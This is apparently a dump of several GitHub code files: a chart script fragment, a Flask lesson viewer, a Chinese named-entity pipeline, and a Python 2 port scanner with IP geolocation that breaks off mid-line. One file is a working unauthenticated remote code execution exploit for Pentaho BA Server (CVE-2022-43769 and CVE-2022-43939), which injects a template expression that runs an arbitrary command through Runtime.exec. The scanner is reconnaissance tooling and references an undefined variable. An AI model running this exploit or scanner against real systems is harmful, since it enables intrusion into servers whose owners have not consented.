axes[2].tick_params(\"y\", labelleft=False)\n    axes[2].boxplot(seq, vert=False)\n\n    plt.show()\n","repo_name":"DefioOWol/data-analysis","sub_path":"Lab-1/charts.py","file_name":"charts.py","file_ext":"py","file_size_in_byte":2967,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"74854747790","text":"from flask import Flask, render_template\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_bootstrap import Bootstrap\nfrom uuid import uuid4\nimport config\n\napp = Flask(__name__)\napp.config.from_object('config')\nbootstrap = Bootstrap(app)\ndb = SQLAlchemy(app)\n\nclass Lesson(db.Model):\n    __tablename__ = 'lessons'\n    id = db.Column(db.Integer, primary_key=True)\n    school_date = db.Column(db.String(80))\n    subject = db.Column(db.String(80))\n    topic = db.Column(db.Text)\n    homework = db.Column(db.Text)\n\n    def __init__(self, school_date, subject, topic, homework):\n        self.school_date = school_date\n        self.subject = subject\n        self.topic = topic\n        self.homework = homework\n\n    def __repr__(self):\n        return f\"Lesson({self.subject})\"\n\n@app.route('/')\ndef index():\n    lessons = Lesson.query.filter(Lesson.topic.isnot(None) | Lesson.homework.isnot(None)).order_by(Lesson.school_date.desc()).all()\n    return render_template('index.html', lessons=lessons)\n\nif __name__ == '__main__':\n    app.run(host='0.0.0.0', 
port=1234)\n","repo_name":"jekabsGritans/lesson-display","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1060,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"9295614706","text":"# Title: Pentaho BA Server EE 9.3.0.0-428 - RCE via Server-Side Template Injection (Unauthenticated)\n# Author: dwbzn\n# Date: 2022-04-04\n# Vendor: https://www.hitachivantara.com/\n# Software Link: https://www.hitachivantara.com/en-us/products/lumada-dataops/data-integration-analytics/download-pentaho.html\n# Version: Pentaho BA Server 9.3.0.0-428\n# CVE: CVE-2022-43769, CVE-2022-43939\n# Tested on: Windows 11\n# Credits: https://research.aurainfosec.io/pentest/pentah0wnage\n# NOTE: This only works on the enterprise edition. Haven't tested it on Linux, but it should work (don't use notepad.exe).\n\n# Unauthenticated RCE via SSTI using CVE-2022-43769 and CVE-2022-43939 (https://research.aurainfosec.io/pentest/pentah0wnage)\nimport requests\nimport argparse\n\nparser = argparse.ArgumentParser(description='CVE-2022-43769 + CVE-2022-43939 - Unauthenticated RCE via SSTI')\nparser.add_argument('baseurl', type=str, help='base url e.g. http://127.0.0.1:8080/pentaho')\nparser.add_argument('--cmd', type=str, default='notepad.exe', nargs='?', help='command to execute (default notepad.exe)', required=False)\nargs = parser.parse_args()\n\nurl = f\"{args.baseurl}/api/ldap/config/ldapTreeNodeChildren/require.js?url=%23{{T(java.lang.Runtime).getRuntime().exec('{args.cmd}')}}&mgrDn=a&pwd=a\"\n\nprint (\"running...\")\nr = requests.get(url)\nif r.text == 'false':\n print (\"command should've executed! nice.\")\nelse:\n print (\"didn't work. sadge...\")","repo_name":"dwbzn/pentaho-exploits","sub_path":"cve-2022-43769.py","file_name":"cve-2022-43769.py","file_ext":"py","file_size_in_byte":1430,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"83"} +{"seq_id":"8152125209","text":"# -*- coding: utf-8 -*-\n\nfrom pyltp import SentenceSplitter\nfrom pyltp import Segmentor\nfrom pyltp import Postagger\nfrom pyltp import NamedEntityRecognizer\nimport os\n\nLTP_DATA_DIR = './model'\ncws_model_path = os.path.join(LTP_DATA_DIR, 'cws.model')\npos_model_path = os.path.join(LTP_DATA_DIR, 'pos.model')\nner_model_path = os.path.join(LTP_DATA_DIR, 'ner.model')\nInput_file = './data/original.txt'\nOutput_file = './data/output_news.txt'\n# 得到分句,返回的是句子组成的列表\nInput_file = open(Input_file, 'r', encoding='utf-8').read()\nsentences = SentenceSplitter.split(Input_file)\n#print ('\\n'.join(sentences))\n\n# 得到词语,返回的是每行中以空格间隔的词\nsegmentor = Segmentor()\nsegmentor.load(cws_model_path)\nwords = []\nprint_words = []\nfor sentence in sentences:\n if (len(sentence) <= 1):\n continue\n word = segmentor.segment(sentence)\n print_word = (' '.join(word))\n print_words.append(print_word)\n words.append(word)\n#print ('\\n'.join(print_words))\n#print (words)\n#words = '\\n'.join(words)\nsegmentor.release()\n\n# 进行词性标注\npostagger = Postagger()\npostagger.load(pos_model_path)\n#words = ''\npostags = []\nfor word in words:\n postag = postagger.postag(word)\n postags.append(postag)\n #print (' '.join(postag))\n #print ('\\n')\n#print (' '.join(postags))\npostagger.release()\n\nrecognizer = NamedEntityRecognizer()\nrecognizer.load(ner_model_path)\n#words = ''\n#postags = ''\nnertags = []\nfor word, postag in zip(words, postags):\n #print (' '.join(word),' '.join(postag))\n word = list(word)\n postag = list(postag)\n #print (word,postag)\n 
nertag = recognizer.recognize(word, postag)\n nertags.append(nertag)\n #print (' '.join(nertag))\nrecognizer.release()\n\nwith open(Output_file, 'w', encoding='utf-8') as f:\n for word, nertag in zip(words, nertags):\n for w, n in zip(word, nertag):\n f.write(w + ' ' + n)\n f.write('\\n')\nprint ('done.')\n\nreadfile = open('./data/output_new.txt','r',encoding='utf-8').readlines()\nwith open('./data/output_news2.txt', 'w', encoding='utf-8') as f:\n for line in readfile:\n line.strip('\\r\\n')\n line.replace('\\n','')\n line = line.split()\n w = line[0]\n n = line[1][:-1]\n\n print (len(w), w, n)\n #print (n=='O', n=='S-Ns')\n if n == 'O' or n=='S' :\n for i in range(len(w)):\n f.write(w[i] + ' O\\n')\n elif n == 'S-Nh' or n == 'B-Nh':\n f.write(w[0] + ' B-PER\\n')\n for i in range(len(w)):\n if (i==0):\n continue\n f.write(w[i] + ' I-PER\\n')\n elif n == 'I-Nh' or n == 'E-Nh':\n for i in range(len(w)):\n f.write(w[i] + ' I-PER\\n')\n elif n == 'S-Ns' or n == 'B-Ns':\n f.write(w[0] + ' B-LOC\\n')\n for i in range(len(w)):\n if (i == 0):\n continue\n f.write(w[i] + ' I-LOC\\n')\n elif n == 'I-Ns' or n == 'E-Ns':\n for i in range(len(w)):\n f.write(w[i] + ' I-LOC\\n')\n elif n == 'S-Ni' or n == 'B-Ni':\n f.write(w[0] + ' B-ORG\\n')\n for i in range(len(w)):\n if (i == 0):\n continue\n f.write(w[i] + ' I-ORG\\n')\n elif n == 'I-Ns' or n == 'E-Ns':\n for i in range(len(w)):\n f.write(w[i] + ' I-ORG\\n')\n\nprint ('done.')\n\nreadfile = open('./data/output_news2.txt', 'r', encoding='utf-8').readlines()\ncharlist = []\ntaglist = []\nfor line in readfile:\n line.strip('\\r\\n')\n line.replace('\\n','')\n line = line.split(' ')\n charlist.append(line[0])\n taglist.append(line[1][:-1])\n\ndef get_PER_entity(tag_seq, char_seq):\n length = len(char_seq)\n PER = []\n for i, (char,tag) in enumerate(zip(char_seq, tag_seq)):\n if tag == 'B-PER':\n if 'per' in locals().keys():\n PER.append(per)\n del per\n per = char\n if i+1 == length:\n PER.append(per)\n if tag == 'I-PER':\n per += char\n if i+1 == length:\n PER.append(per)\n if tag not in ['I-PER','B-PER']:\n if 'per' in locals().keys():\n PER.append(per)\n del per\n continue\n return PER\n\ndef get_LOC_entity(tag_seq, char_seq):\n #print (tag_seq, char_seq)\n length = len(char_seq)\n LOC = []\n for i, (char, tag) in enumerate(zip(char_seq, tag_seq)):\n if tag == 'B-LOC':\n if 'loc' in locals().keys():\n LOC.append(loc)\n del loc\n loc = char\n if i+1 == length:\n LOC.append(loc)\n if tag == 'I-LOC':\n loc += char\n if i+1 == length:\n LOC.append(loc)\n if tag not in ['I-LOC', 'B-LOC']:\n if 'loc' in locals().keys():\n LOC.append(loc)\n del loc\n continue\n return LOC\n\n\ndef get_ORG_entity(tag_seq, char_seq):\n length = len(char_seq)\n ORG = []\n for i, (char, tag) in enumerate(zip(char_seq, tag_seq)):\n if tag == 'B-ORG':\n if 'org' in locals().keys():\n ORG.append(org)\n del org\n org = char\n if i+1 == length:\n ORG.append(org)\n if tag == 'I-ORG':\n org += char\n if i+1 == length:\n ORG.append(org)\n if tag not in ['I-ORG', 'B-ORG']:\n if 'org' in locals().keys():\n ORG.append(org)\n del org\n continue\n return ORG\n\ndef get_entity(tag_seq, char_seq):\n PER = get_PER_entity(tag_seq, char_seq)\n LOC = get_LOC_entity(tag_seq, char_seq)\n ORG = get_ORG_entity(tag_seq, char_seq)\n return PER, LOC, ORG\n\nwith open('./data/entity_new.txt', 'w', encoding='utf-8') as f:\n PER, LOC, ORG = get_entity(taglist, charlist)\n print ('PER: {}\\nLOC: {}\\nORG:{}'.format(PER,LOC,ORG))\n f.write ('PER: {}\\nLOC: {}\\nORG:{}'.format(PER,LOC,ORG))\n\nprint 
('done.')\n\n","repo_name":"NewNoobBird/ChineseNER","sub_path":"LTP/ltp.py","file_name":"ltp.py","file_ext":"py","file_size_in_byte":6100,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"12415479304","text":"#!/usr/bin/python2\n# Created ybenel \n\nimport optparse\nimport socket,datetime\nfrom time import sleep\nfrom os import system as sy\ntry:\n import json\nexcept:\n print(\"[!] Error [ Json ] Is Not Exist !!!\\n[*] Please Install It Using This Command: pip2 install simplejson\")\n exit(1)\ntry:\n import urllib2\nexcept KeyboardInterrupt:\n pass\nexcept:\n print(\"[!] Error [ Urllib2 ] Is Not Exist !!!\\n[*] Please reinstall your python, because it comes with python\")\n exit(1)\n\n####################\nwi='\\033[1;37m'\nrd='\\033[1;31m'\ngr='\\033[1;32m'\nyl='\\033[1;33m'\npu='\\033[1;35m'\ncy='\\033[1;36m'\nGreen=\"\\033[1;33m\"\nBlue=\"\\033[1;34m\"\nGrey=\"\\033[1;30m\"\nReset=\"\\033[0m\"\nyellow=\"\\033[1;36m\"\nRed=\"\\033[1;31m\"\npurple=\"\\033[35m\"\nLight=\"\\033[95m\"\ncyan=\"\\033[96m\"\nstong=\"\\033[39m\"\nunknown=\"\\033[38;5;82m\"\nunknown2=\"\\033[38;5;198m\"\nunknown3=\"\\033[38;5;208m\"\nunknown4=\"\\033[38;5;167m\"\nunknown5=\"\\033[38;5;91m\"\nunknown6=\"\\033[38;5;210m\"\nunknown7=\"\\033[38;5;165m\"\nunknown8=\"\\033[38;5;49m\"\nunknown9=\"\\033[38;5;160m\"\nunknown10=\"\\033[38;5;51m\"\nunknown11=\"\\033[38;5;13m\"\nunknown12=\"\\033[38;5;162m\"\nunknown13=\"\\033[38;5;203m\"\nunknown14=\"\\033[38;5;113m\"\nunknown15=\"\\033[38;5;14m\"\n####################\n\n\n\n#############time####################\n #\nmytime = datetime.datetime.now() #\nhour = mytime.hour #\nmin = mytime.minute #\nsec = mytime.second #######\ntimenow = \"{}:{}:{}\".format(hour,min,sec) #\n###########################################\n\n\n### CHECK INTERNET ######################################\n #\nserver = \"www.google.com\" #\n #\ndef check(): #\n try: #\n host = socket.gethostbyname(server) #\n conn = socket.create_connection((host, 80), 2) #\n return True #\n except: #\n pass #\n return False #\nchecknet1 = check() #\nchecknet2 = checknet1 #\nchecknet3 = checknet2 #\n #\n################ DONE!###################################\n\ndef msgerror():\n print(rd + \"\\n[!]:Ops:\"+yl+\"You Not Connected To [\"+rd+\" INTERNET\"+yl+\" ]\"+Blue+\"\\n[*]\"+gr+\":\"+wi+\"Please Connect To [ \"+rd+\"INTERNET\"+wi+\" ] And Try Again \"+rd+\":)\")\n exit()\n\n##########################################=>>OPTIONS<<=###########################################\nprint(\" \"+Green+\"MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM\")\nprint(\" \"+Blue+\"MMMMMMMMMMNKWMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM\")\nprint(\" \"+Grey+\"MMMMMMMMMNc.dWMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM\")\nprint(\" \"+Reset+\"MMMMMMMMWd. .kWMMMMMMMMMMMMMMMMMMMMMMW0KMMMMMMMMMM\")\nprint(\" \"+yellow+\"MMMMMMMMk:;. 'OMMMMMMMMMMMMMMMMMMMMMWx.,0MMMMMMMMM\")\nprint(\" \"+Red+\"MMMMMMMK:ok. ,0MMMMMMMMMMMMMMMMMMMWO. .cXMMMMMMMM\")\nprint(\" \"+purple+\"MMMMMMNl:KO. ;KWNXK00O0000KXNWMMWO' .c;dWMMMMMMM\")\nprint(\" \"+Light+\"MMMMMMx,xNk. .;'... ....';:l:. ,0l,0MMMMMMM\")\nprint(\" \"+cyan+\"MMMMMK;,l;. .,:cc:;. .dx,lWMMMMMM\")\nprint(\" \"+stong+\"MMMMWo ,dKWMMMMWXk:. .cdkOOxo,. ...OMMMMMM\")\nprint(\" \"+unknown+\"MMMM0' cXMMWKxood0WWk. .lkONMMNOOXO, lWMMMMM\")\nprint(\" \"+unknown2+\"MMMWl ;XMMNo. .lXWd. .dWk;;dd;;kWM0' '0MMMMM\")\nprint(\" \"+unknown3+\"kxko. lWMMO. .kMO. .OMMK; .kMMMNc oWMMMM\")\nprint(\" \"+unknown4+\"X0k:. 
;KMMXc :XWo .dW0c,lo;;xNMK, 'xkkk0\")\nprint(\" \"+unknown5+\"kko' :KMMNkl::lkNNd. .dkdKWMNOkXO, .lOKNW\")\nprint(\" \"+unknown6+\"0Kk:. .lOXWMMWN0d, 'lxO0Oko;. .ckkOO\")\nprint(\" \"+unknown7+\"kkkdodo;. .,;;;'. .:ooc. . ...ck0XN\")\nprint(\" \"+unknown8+\"0XWMMMMWKxc'. ;dxc. .,cxKK0OkkOO\")\nprint(\" \"+unknown9+\"MMMMMMMMMMMN0d:'. .' .l' .;lxKWMMMMMMMMMN\")\nprint(\" \"+unknown10+\"MMMMMMMMMMMMMMMN0xo0O:,;;;;;;xN0xOXWMMMMMMMMMMMMMM\")\nprint(\" \"+unknown11+\"MMMMMMMMMMMMMMMMMMMMMMWWWWWMMMMMMMMMMMMMMMMMMMMMMM\")\nprint(\" \"+unknown12+\"MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM\")\nprint(\" \"+unknown13+\"MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM\")\nprint(\" \"+unknown14+\"MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM\")\nprint(\" \"+unknown15+\"MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM\")\nprint(\" \"+Blue+\" \"+unknown+\"[\"+unknown15+\"TheEye\"+unknown+\"]\"+unknown+\" \")\nprint(\" \"+purple+\" \"+unknown+\"[\"+unknown9+\" Created By ybenel\"+unknown+\"]\"+unknown+\" \"+Reset+\"\\n\")\nparse = optparse.OptionParser(unknown10+\"\"\"\\\n\n[$] [$]\n +=====================================================================+\n |> USAGE: python2 ./TheEye.py -S [OPTIONS...] <|\n +=====================================================================+\n | |\n | >OPTIONS<: |\n +=====================================================================+\n | |\n | -O ::> SCAN [SINGLE] PORT |\n | -M ::> SCAN [MANY] PORTS |\n | -R ::> [RANGE] PORTS |\n | -T ::> Set Timeout For Connection close |\n | |\n | >EXAMPLES<: |\n +=====================================================================+\n | |\n | TheEye -S www.google.com -O 80 |\n | TheEye -S 192.168.1.1 -M 80,443,21,22,23,25,53 |\n | TheEye -S www.fb.com -R 1-1000 |\n | |\n | TheEye --server 192.168.1.121 --one-port 80 --timeout 10 |\n | TheEye -s www.google.com -m 21,22,23,80,443 -t 10 |\n | (Hack_The_Planet) |\n +=====================================================================+\n[$] [$]\n\"\"\",version='TheEye Version: 1.0')\n################################### DONE! 
#######################################################\n\n###################### MAKE MAIN AND FUNCTION #######################################\n\ndef main():\n parse.add_option(\"-S\",\"-s\",\"--server\",'--SERVER',dest=\"TARGET\",type=\"string\")\n parse.add_option(\"-O\",\"-o\",\"--one-port\",'--ONE-PORT',dest=\"Oport\",type=\"string\")\n parse.add_option(\"-M\",\"-m\",\"--many-port\",'--MANY-PORT',dest=\"Mport\",type=\"string\")\n parse.add_option(\"-R\",\"-r\",\"--range-port\",'--RANGE-PORT',dest=\"Rport\",type=\"string\")\n parse.add_option(\"-T\",\"-t\",\"--timeout\",'--TIMEOUT',dest=\"timeout\",type=\"string\")\n parse.add_option(\"-V\",\"-v\",'--VERSION',action=\"store_true\",dest=\"version\",default=False)\n (options,args) = parse.parse_args()\n if options.version:\n print(\"SpyPorte Version: 2.5\")\n elif options.TARGET !=None and options.Oport !=None:\n target = options.TARGET\n port = options.Oport\n if int(port) < 0 or int(port) > 65535:\n print(rd+\"\\n[\"+yl+\"!\"+rd+\"]\"+yl+\" Error: Invalid PORT[ \"+wi+str(port)+yl+\" ]\\n\"+rd+\"[\"+yl+\"!\"+rd+\"]\"+yl+\" Must Be Between [ \"+wi+\"0 \"+yl+\"&\"+wi+\" 65535\"+yl+\" ]\")\n exit(1)\n def servername():\n try:\n ser = socket.getservbyport(int(port))\n return ser\n except OSError:\n return \"TCP\"\n except socket.error:\n return \"TCP\"\n servername = servername()\n global checknet1\n if target ==\"127.0.0.1\":\n checknet1 = True\n\n if checknet1 == True:\n def checkser():\n if target !=\"127.0.0.1\":\n try:\n ip = socket.gethostbyname(target)\n return True\n except:\n pass\n return False\n else:\n return True\n if checkser() !=True:\n print(yl+\"\\n[!]:\"+rd+\"Error:[\"+yl+\"404\"+rd+\"]\"+wi+\" SERVER Not Found\"+rd+\"!!\")\n exit(1)\n try:\n ip = socket.gethostbyname(target)\n print(unknown2+\"\\n[*]:method: SINGLE-PORT=> [ {} ]\".format(port))\n sleep(1.8)\n print(unknown8+\"[>]:ServerIP: {}\".format(ip))\n try:\n url = \"http://ip-api.com/json/\"\n reponse = urllib2.urlopen(url + str(ip) )\n name = reponse.read()\n labs = json.loads(name)\n test = labs['regionName']\n print(rd+\"INFO\"+gr+\":[\"+wi+str(ip)+gr+\"]===:\")\n sleep(0.10)\n print(gr + \"\\t\\t IP: \" +stong+ labs['query'])\n sleep(0.10)\n print(gr+ \"\\t\\t Status: \" +unknown+ labs['status'])\n sleep(0.10)\n print(gr+ \"\\t\\t Region: \" +unknown5+ test)\n sleep(0.10)\n print(gr + \"\\t\\t Country: \" +unknown3+ labs['country'])\n sleep(0.10)\n print(gr + \"\\t\\t City: \" +unknown6+ labs['city'])\n sleep(0.10)\n print(gr + \"\\t\\t ISP: \"+unknown2 + labs['isp'])\n sleep(0.10)\n print(gr + \"\\t\\t Lat,Lon: \"+unknown4 + str(labs['lat']) + \",\" + str(labs['lon']))\n sleep(0.10)\n print(gr + \"\\t\\t ZIPCODE: \"+unknown12 + labs['zip'])\n sleep(0.10)\n print(gr + \"\\t\\t TimeZone: \" +unknown11 + labs['timezone'])\n sleep(0.10)\n print(gr + \"\\t\\t AS: \" +unknown15 + labs['as'])\n sleep(0.10)\n print(pu+\"===============================\\n\"+wi)\n except:\n pass\n sleep(0.60)\n print(purple+\"[$]:Start At: {}\".format(timenow))\n sleep(0.60)\n print(Blue+\"[#]:Checking.......\")\n sleep(1.5)\n con = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n if options.timeout !=None:\n timeout = options.timeout\n con.settimeout(int(timeout))\n else:\n con.settimeout(5)\n con.connect((ip,int(port)))\n print(bl + \"\\n[+]\"+gr+\":\"+wi+\"PORT[\"+gr+str(port)+wi+\"/\"+cy+servername+wi+\"] <=\"+gr+\"OPEN\"+wi+\"=>\")\n except KeyboardInterrupt:\n print(rd+\"[CTRL+C]:\"+yl+\"Exiting\"+rd+\".....\")\n sleep(2.5)\n exit()\n except socket.error:\n 
print(rd+\"\\n[-]\"+wi+\":PORT[\"+rd+str(port)+wi+\"/\"+yl+servername+wi+\"] <=\"+rd+\"CLOSE!\"+wi+\"=>\")\n except:\n print(rd+\"\\n[!]\"+yl+\"[ERROR] Something Went Wrong...\"+gr+\"Try Again :)\")\n exit(1)\n print(gr+\"---------------------------------\\n[$]\"+unknown7+\" Shutdown At: {}\".format(timenow))\n else:\n msgerror()\n\n elif options.TARGET !=None and options.Mport !=None:\n target = options.TARGET\n port = options.Mport\n if \",\" in port:\n ports = port.split(\",\")\n else:\n print(rd+\"\\n[!]\"+yl+\"[ERROR] Please Use\"+gr+\" [\"+yl+\" , \"+gr+\"]\"+yl+\" For Distinguish Ports\"+gr+\" Ex: \"+yl+\"22,80,23,25,135,445,21\")\n exit(1)\n global checknet2\n if target ==\"127.0.0.1\":\n checknet2 = True\n\n if checknet2 == True:\n def checkser():\n if target !=\"127.0.0.1\":\n try:\n ip = socket.gethostbyname(target)\n return True\n except:\n pass\n return False\n else:\n return True\n if checkser() !=True:\n print(yl+\"\\n[!]:\"+rd+\"Error:[\"+yl+\"404\"+rd+\"]\"+wi+\" SERVER Not Found\"+rd+\"!!\")\n exit(1)\n\n\n ip = socket.gethostbyname(target)\n print(unknown2+\"\\n[*]:method: MANY-PORT=> [ {} ]\".format(port))\n sleep(1.8)\n print(unknown8+\"[>]:ServerIP: {}\".format(ip))\n try:\n url = \"http://ip-api.com/json/\"\n reponse = urllib2.urlopen(url + str(ip) )\n name = reponse.read()\n labs = json.loads(name)\n test = labs['regionName']\n print(rd+\"INFO\"+gr+\":[\"+wi+str(ip)+gr+\"]===:\")\n sleep(0.10)\n print(gr + \"\\t\\t IP: \" +stong+ labs['query'])\n sleep(0.10)\n print(gr+ \"\\t\\t Status: \" +unknown+ labs['status'])\n sleep(0.10)\n print(gr+ \"\\t\\t Region: \" +unknown5+ test)\n sleep(0.10)\n print(gr + \"\\t\\t Country: \" +unknown3+ labs['country'])\n sleep(0.10)\n print(gr + \"\\t\\t City: \" +unknown6+ labs['city'])\n sleep(0.10)\n print(gr + \"\\t\\t ISP: \"+unknown2 + labs['isp'])\n sleep(0.10)\n print(gr + \"\\t\\t Lat,Lon: \"+unknown4 + str(labs['lat']) + \",\" + str(labs['lon']))\n sleep(0.10)\n print(gr + \"\\t\\t ZIPCODE: \"+unknown12 + labs['zip'])\n sleep(0.10)\n print(gr + \"\\t\\t TimeZone: \" +unknown11+ labs['timezone'])\n sleep(0.10)\n print(gr + \"\\t\\t AS: \" +unknown15+ labs['as'])\n sleep(0.10)\n print(pu+\"===============================\\n\"+wi)\n except:\n pass\n sleep(0.60)\n print(purple+\"[$]:Start At: {}\".format(timenow))\n sleep(0.60)\n print(Blue+\"[#]:Checking.......\")\n sleep(1.5)\n for p in ports:\n try:\n servername = socket.getservbyport(int(p))\n except socket.error:\n servername = \"TCP\"\n except OSError:\n servername = \"TCP\"\n try:\n con = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n if options.timeout !=None:\n timeout = options.timeout\n con.settimeout(int(timeout))\n else:\n con.settimeout(5)\n con.connect((ip,int(p)))\n print(bl + \"\\n[+]\"+gr+\":\"+wi+\"PORT[\"+gr+str(p)+wi+\"/\"+cy+servername+wi+\"]\"+wi+\" <=\"+gr+\"OPEN\"+wi+\"=>\")\n except KeyboardInterrupt:\n print(rd+\"[CTRL+C]:\"+yl+\"Exiting\"+rd+\".....\")\n sleep(2.5)\n break\n except socket.error:\n print(rd+\"\\n[-]\"+wi+\":PORT[\"+rd+str(p)+wi+\"/\"+yl+servername+wi+\"] <=\"+rd+\"CLOSE!\"+wi+\"=>\")\n except:\n print(rd+\"\\n[!]\"+yl+\"[ERROR] Something Went Wrong\"+rd+\" !!!\")\n print(gr+\"---------------------------------\\n[$]\"+unknown7+\" Shutdown At: {}\".format(timenow))\n\n else:\n msgerror()\n\n elif options.TARGET !=None and options.Rport !=None:\n target = options.TARGET\n port = options.Rport\n if \"-\" in port:\n ports = port.split(\"-\")\n if int(ports[0]) > int(ports[1]):\n print(rd+\"\\n[!] 
\"+yl+\"Wrong,The First Range Port\"+gr+\"[\"+rd+str(ports[0])+gr+\"]\"+yl+\" Is Bigger Than Last Range Port\"+gr+\"[\"+rd+str(ports[1])+gr+\"]\"+rd+\" !!!\")\n exit(1)\n elif int(ports[0]) > 65535 or int(ports[1]) > 65535:\n print(rd+\"\\n[\"+yl+\"!\"+rd+\"]\"+yl+\" Error: Invalid Range-PORT[ \"+wi+str(ports)+yl+\" ]\\n\"+rd+\"[\"+yl+\"!\"+rd+\"]\"+yl+\" Must be between [ \"+wi+\"0 \"+yl+\"&\"+wi+\" 65535\"+yl+\" ]\")\n exit(1)\n else:\n print(rd+\"\\n[!]\"+yl+\"[ERROR] Please Use\"+gr+\" [\"+yl+\" - \"+gr+\"]\"+yl+\" For Distinguish First Range to Last Range Ports \"+gr+\"Ex: \"+yl+\"1-50\")\n exit(1)\n global checknet3\n if target ==\"127.0.0.1\":\n checknet3 = True\n\n if checknet3 == True:\n def checkser():\n if target !=\"127.0.0.1\":\n try:\n ip = socket.gethostbyname(target)\n return True\n except:\n pass\n return False\n else:\n return True\n if checkser() !=True:\n print(yl+\"\\n[!]:\"+rd+\"Error:[\"+yl+\"404\"+rd+\"]\"+wi+\" SERVER Not Found\"+rd+\"!!\")\n exit(1)\n ip = socket.gethostbyname(target)\n print(unknown2+\"\\n[*]:method: RANGE-PORT=> [ {} ]\".format(port))\n sleep(1.8)\n print(unknown8+\"[>]:ServerIP: {}\".format(ip))\n try:\n url = \"http://ip-api.com/json/\"\n reponse = urllib2.urlopen(url + str(ip) )\n name = reponse.read()\n labs = json.loads(name)\n test = labs['regionName']\n print(rd+\"INFO\"+gr+\":[\"+wi+str(ip)+gr+\"]===:\")\n sleep(0.10)\n print(gr + \"\\t\\t IP: \" +stong+ labs['query'])\n sleep(0.10)\n print(gr+ \"\\t\\t Status: \" +unknown+ labs['status'])\n sleep(0.10)\n print(gr+ \"\\t\\t Region: \" +unknown5+ test)\n sleep(0.10)\n print(gr + \"\\t\\t Country: \" +unknown3+ labs['country'])\n sleep(0.10)\n print(gr + \"\\t\\t City: \" +unknown6+ labs['city'])\n sleep(0.10)\n print(gr + \"\\t\\t ISP: \"+unknown2 + labs['isp'])\n sleep(0.10)\n print(gr + \"\\t\\t Lat,Lon: \"+unknown4 + str(labs['lat']) + \",\" + str(labs['lon']))\n sleep(0.10)\n print(gr + \"\\t\\t ZIPCODE: \"+unknown12 + labs['zip'])\n sleep(0.10)\n print(gr + \"\\t\\t TimeZone: \" +unknown11+ labs['timezone'])\n sleep(0.10)\n print(gr + \"\\t\\t AS: \" +unknown15+ labs['as'])\n sleep(0.10)\n print(pu+\"===============================\\n\"+wi)\n except:\n pass\n sleep(0.60)\n print(purple+\"[$]:Start At: {}\".format(timenow))\n sleep(0.60)\n print(Blue+\"[#]:Checking.......\")\n sleep(1.5)\n found = []\n try:\n for p in xrange( int(ports[0]) , int(ports[1])+1):\n try:\n servername = socket.getservbyport(int(p))\n except socket.error:\n servername = \"TCP\"\n except OSError:\n servername = \"TCP\"\n try:\n con = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n if options.timeout !=None:\n timeout = options.timeout\n con.settimeout(int(timeout))\n else:\n con.settimeout(0.05)\n con.connect((ip,int(p)))\n print(bl + \"\\n[+]\"+gr+\":\"+wi+\"PORT[\"+gr+str(p)+wi+\"/\"+cy+servername+wi+\"] <=\"+gr+\"OPEN\"+wi+\"=>\")\n found.append(p)\n except KeyboardInterrupt:\n print(rd+\"[CTRL+C]:\"+yl+\"Exiting\"+rd+\".....\")\n sleep(2.5)\n if len(found) > 0:\n print(gr+\"\\n[\"+cy+\"*\"+gr+\"]\"+wi+\" OPEN PORT(s) \"+gr+\"Found!\\n-----------------------------\")\n loop =1\n for i in found:\n try:\n servername = socket.getservbyport(int(i))\n except socket.error:\n servername = \"TCP\"\n except OSError:\n servername = \"TCP\"\n print(gr+\"\\t[\"+wi+str(loop)+gr+\"] \"+yl+ip+wi+\":\"+gr+str(i)+wi+\"/\"+cy+servername+wi+\" STATUS:[ \"+gr+\"OPEN\"+wi+\" ]\")\n loop +=1\n exit(1)\n\n except socket.error:\n print(rd+\"\\n[-]\"+wi+\":PORT[\"+rd+str(p)+wi+\"/\"+yl+servername+wi+\"] 
<=\"+rd+\"CLOSE!\"+wi+\"=>\")\n except:\n print(rd+\"\\n[!]\"+yl+\"[ERROR] Something Went Wrong \"+rd+\"!!!\")\n\n if len(found) > 0:\n print(rd+\"---------------------------------\\n[#]\"+gr+\" Result\"+rd+\" [#]\\n\")\n print(gr+\"[*] \"+wi+\"TARGET:\"+bl+\" {}\\n\".format(target)+gr+\"[*]\"+wi+\" OPEN PORT(s) \"+gr+\"Found!\\n-----------------------------\")\n loop =1\n for i in found:\n try:\n servername = socket.getservbyport(int(i))\n except socket.error:\n servername = \"TCP\"\n except OSError:\n servername = \"TCP\"\n print(gr+\"\\t[\"+wi+str(loop)+gr+\"] \"+yl+ip+wi+\":\"+gr+str(i)+wi+\"/\"+cy+servername+wi+\" STATUS:[ \"+gr+\"OPEN\"+wi+\" ]\")\n loop +=1\n print(gr+\"\\n[$]\"+unknown7+\" Shutdown At: {}\".format(timenow))\n else:\n print(gr+\"---------------------------------\\n[#]\"+rd+\" Result\"+gr+\" [#]\\n\")\n print(gr+\"[*] \"+wi+\"TARGET:\"+yl+\" {}\\n\".format(target)+wi+\"[\"+rd+\"!\"+yl+\"] OPEN PORT(s):\"+rd+\" No Open Port(s) Found !! :(\")\n print(gr+\"[$]\"+unknown7+\" Shutdown At: {}\".format(timenow))\n exit(1)\n\n except KeyboardInterrupt:\n print(rd+\"\\n[CTRL+C]:\"+yl+\"Exiting\"+rd+\".....\")\n sleep(2.5)\n if len(found) > 0:\n print(gr+\"\\n[\"+cy+\"*\"+gr+\"]\"+wi+\" OPEN PORT(s) \"+gr+\"Found!\\n-----------------------------\")\n loop = 1\n for i in found:\n try:\n servername = 